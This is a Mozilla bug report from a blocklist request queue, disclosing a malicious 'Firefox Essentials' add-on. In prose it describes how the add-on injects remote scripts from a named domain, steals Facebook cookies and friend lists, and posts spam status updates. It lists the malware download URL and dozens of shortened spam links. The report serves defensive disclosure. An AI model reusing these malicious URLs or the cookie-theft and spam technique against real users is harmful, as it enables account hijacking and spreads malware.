Closed
Bug 724691
Opened 13 years ago
Closed 13 years ago
Malicious "Firefox Essentials" add-on
Categories
(Toolkit :: Blocklist Policy Requests, defect)
Toolkit
Blocklist Policy Requests
Tracking
()
RESOLVED
FIXED
People
(Reporter: mhammell, Assigned: jorgev)
Details
Attachments
(1 file)
|
80.69 KB,
application/octet-stream
|
Details |
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.77 Safari/535.7
Steps to reproduce:
Downloaded add-on from http://lacolom[.]be/fbs.xpi
Actual results:
The add-on injects JS to inject http://lacolom.be/g.js, which injects http://www.lacolom.be/oepp.php as JS.
oepp.php:
Steals your cookies
Steals you friend list via /ajax/typeahead/first_degree.php
Picks one of the following bit.ly URLs:
http://bit.ly/A54fuM
http://bit.ly/A5BioE
http://bit.ly/A61qQj
http://bit.ly/AkDIFP
http://bit.ly/AqZ0Om
http://bit.ly/wAANlt
http://bit.ly/wPYUpe
http://bit.ly/wfRFEa
http://bit.ly/wjuuaZ
http://bit.ly/x4ig0a
http://bit.ly/x7cnJj
http://bit.ly/x90Fc6
http://bit.ly/xCjMIo
http://bit.ly/xKMbLH
http://bit.ly/xL31ch
http://bit.ly/xf7vnN
http://bit.ly/xuWFKm
http://bit.ly/y4eAYc
http://bit.ly/yDGIoi
http://bit.ly/yFZ9eM
http://bit.ly/yQbCxV
http://bit.ly/yoVZbq
http://bit.ly/ytvSEJ
http://bit.ly/z48I3i
http://bit.ly/zEB37d
http://bit.ly/zOo8me
http://bit.ly/zkg07u
Posts it as a status update via /ajax/updatestatus.php, and mentions your friends.
Picks one of he following bit.ly URLs:
http://bit.ly/A4uCl8
http://bit.ly/A5ixGO
http://bit.ly/AESbVg
http://bit.ly/AhONYc
http://bit.ly/AiCvpH
http://bit.ly/wJDMu7
http://bit.ly/wNcTf6
http://bit.ly/wRokAK
http://bit.ly/wYaljt
http://bit.ly/wfRFEa
http://bit.ly/wjrfV3
http://bit.ly/wk4NBy
http://bit.ly/wmEBss
http://bit.ly/wum0Ui
http://bit.ly/wvjyrp
http://bit.ly/x6ERiI
http://bit.ly/xPfRQs
http://bit.ly/xj3Fsb
http://bit.ly/xzpzvJ
http://bit.ly/y1BfN5
http://bit.ly/y7zJKt
http://bit.ly/yQe6r7
http://bit.ly/yc8K1n
http://bit.ly/ycQxii
http://bit.ly/ylhBqc
http://bit.ly/zt6Wgw
http://bit.ly/zw7uy2
Posts it as an update to your timeline via /ajax/ufi/modify.php
Picks one of the following FB pages:
221128464647487
227499167340992
232493100172345
266988576702848
296308197093558
316095231773903
318315724872330
330406740337729
336886886352146
362134143796905
and has you post about it via /ajax/ufi/modify.php.
Expected results:
It shouldn't steal your cookies and post to Facebook on your behalf without your consent.
|
Assignee | |
Comment 1•13 years ago
|
||
Assignee: nobody → jorge
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true
|
|
Assignee | |
Comment 2•13 years ago
|
||
Status: ASSIGNED → RESOLVED
Closed: 13 years ago
Resolution: --- → FIXED
|
||
Updated•9 years ago
|
Product: addons.mozilla.org → Toolkit
You need to log in
before you can comment on or make changes to this bug.
Description
•